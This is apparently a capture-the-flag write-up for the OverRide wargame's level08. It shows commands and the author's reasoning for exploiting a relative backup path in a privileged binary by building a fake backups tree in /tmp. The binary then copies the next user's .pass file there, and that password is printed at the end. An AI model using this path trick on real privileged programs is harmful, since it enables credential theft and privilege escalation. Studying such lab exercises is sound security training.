level08@OverRide:~$ objdump -R level08

level08:     file format elf64-x86-64

DYNAMIC RELOCATION RECORDS
OFFSET           TYPE              VALUE
0000000000601ff8 R_X86_64_GLOB_DAT  __gmon_start__
0000000000601f80 R_X86_64_JUMP_SLOT  strcpy
0000000000601f88 R_X86_64_JUMP_SLOT  write
0000000000601f90 R_X86_64_JUMP_SLOT  fclose
0000000000601f98 R_X86_64_JUMP_SLOT  __stack_chk_fail
0000000000601fa0 R_X86_64_JUMP_SLOT  printf
0000000000601fa8 R_X86_64_JUMP_SLOT  snprintf
0000000000601fb0 R_X86_64_JUMP_SLOT  strncat
0000000000601fb8 R_X86_64_JUMP_SLOT  fgetc
0000000000601fc0 R_X86_64_JUMP_SLOT  close
0000000000601fc8 R_X86_64_JUMP_SLOT  strcspn
0000000000601fd0 R_X86_64_JUMP_SLOT  __libc_start_main
0000000000601fd8 R_X86_64_JUMP_SLOT  fprintf
0000000000601fe0 R_X86_64_JUMP_SLOT  open
0000000000601fe8 R_X86_64_JUMP_SLOT  fopen
0000000000601ff0 R_X86_64_JUMP_SLOT  exit

level08@OverRide:~$ ./level08
Usage: ./level08 filename

level08@OverRide:~$ ls
backups  level08

# Let's understand what happend, the prog first fopen("./backups/.log",w)
# Then, the prog fopen(argv[1],r)
# And it copy the content of argv[1] in a new file with path ./backups/argv[1], so let's try to open /home/users/level09/.pass

# Well, it's not that easy
level08@OverRide:~$ ./level08 /home/users/level09/.pass
ERROR: Failed to open ./backups//home/users/level09/.pass

# If we try to create a file in ./backups we get a Permission denied, since the only place we can write is /tmp we need to find a way to write here ?
# Test... Test... Test... Test... 
# I can't use the arg to exploit this thing 😢

# Thinking of it the path of ./backups is relative not absolute, so we can try to create a backups replica in /tmp
# And since the file is copied with same path we create it so the prog as acces
mkdir -p /tmp/backups/home/users/level09/ 

# Now we test again but from /tmp
> level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass
> level08@OverRide:/tmp$ cat backups/home/users/level09/.pass
fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
